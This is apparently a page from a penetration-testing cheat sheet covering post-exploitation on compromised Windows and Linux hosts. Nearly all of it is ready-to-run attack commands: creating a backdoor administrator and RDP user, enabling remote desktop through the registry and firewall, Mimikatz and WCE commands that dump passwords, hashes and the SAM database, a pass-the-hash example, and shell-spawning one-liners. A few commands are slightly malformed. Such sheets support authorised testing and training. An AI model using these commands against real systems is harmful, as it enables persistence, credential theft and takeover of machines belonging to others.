Post exploitation

Don't.stop.here.you.are.only.halfway.

Proof.txt

Linux

cat /root/proof.txt

Windows

type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Windows

Add RDP user

net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP

Via registry:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Add firewall rule:

netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Rdesktop resolution

rdesktop -g 1024x768 x.x.x.x

Passwords and hashes

Mimikatz

Extract passwords, keys, pin codes, tickets from "lsass" memory:

privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords

Pass-the-hash

privilege::debug
log sekurlsa.log
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd

Elevate token

privilege::debug
log sekurlsa.log
token::elevate

Dump SAM

privilege::debug
log sekurlsa.log
lsadump::sam

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.

LogoAmplia Security - Research - Windows Credentials Editor (WCE)www.ampliasecurity.com
C:\> wce -w

Networking

Is there a connection with another host?

netstat -ano

Hosts file

C:\WINDOWS\System32\drivers\etc\hosts

Firewall config

netsh firewall show state
netsh firewall show config
netsh dump

PowerShell tools

Empire

LogoGitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.GitHub

PowerSploit

LogoGitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation FrameworkGitHub

Linux

Spawn TTY shell

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/bash -i
/bin/sh -i
perl —e 'exec "/bin/sh";'
PreviousPrivilege escalationNextLateral movement

Last updated

Was this helpful?